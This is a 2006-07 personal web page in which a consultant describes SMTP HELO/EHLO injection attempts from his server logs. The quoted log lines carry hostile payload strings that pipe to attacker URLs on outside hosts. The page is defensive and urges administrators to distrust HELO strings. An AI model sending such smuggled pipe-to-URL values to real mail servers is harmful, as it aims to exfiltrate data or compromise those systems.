Software Consulting Tornado Icon Software Consulting Tornado Icon

SMTP HELO/EHLO Pipe/Program Attacks

An example of what is likely to be an exploit of insufficiently careful SMTP servers has been repeatedly showing up in my own server logs: 

2006-11-... rblsmtpd: [pid] EHLO "|http://mail.oldartero.com:8889/cgi-bin/put"
2006-11-... rblsmtpd: [pid] HELO "|http://mail.oldartero.com:8889/cgi-bin/put"

(Note that I've patched my version of rblsmtpd to log things like HELO strings, among other things.)

More recently I've been seeing: 

2007-01-... rblsmtpd: 17051 EHLO "|http://esunhuitionkdefunhsadwa.com:8888/cgi-bin/put.cgi"
2007-01-... rblsmtpd: 17051 HELO "|http://esunhuitionkdefunhsadwa.com:8888/cgi-bin/put.cgi"

Note the vertical bar at the beginning of the HELO/EHLO strings provided by the SMTP client (which surely is intending to inject spam or vermin into my system, if it hadn't been blocked by one of the RBLs I use).

That vertical bar, in another context, would cause data to be piped through the program that is subsequently named — in this case, a URL for a server that is perhaps set up to record whatever data gets piped. But that only works if the underlying system offers such a feature, which is true for Unix and its variants, and if the SMTP server fails to tag or validate the string prior to exposing it to the underlying system's flexibility and power.

(Normally, a HELO/EHLO request specifies a unique name for an SMTP client, usually one of the host or server names on whose behalf it is acting. Mine uses "theburleys.net" at the moment. Originally, this was designed to help prevent mail loops. These days, many SMTP servers analyze this "unique name" provided by an SMTP client in order to try to decide whether the client is legitimate — for example, since it usually is a FQDN, it is probably going to have at least one period (dot) if the client is legitimate.)

It is unlikely spammers or vermin authors tried this technique without first having become aware that some SMTP servers, perhaps in their zeal to determine the legitimacy of the client, use the "unique name" in a fashion that amounts to trusting it to not specify piping to a program or URL.

(I'm a bit unclear as to how this exploit would actually work in a typical Unix shell environment, since Unix shells don't normally recognize URLs as legitimate program names. Perhaps Perl's "open" function or PHP is involved?)

SMTP server administrators should therefore double-check that whatever scripts they use to validate HELO strings (during the SMTP sessions or later when examining SMTP logs) treat those strings as utterly untrustworthy.

Google

Back to my "hostile environments" page.

Copyright (C) 2006 James Craig Burley, Software Craftsperson
Last modified on 2007-07-10.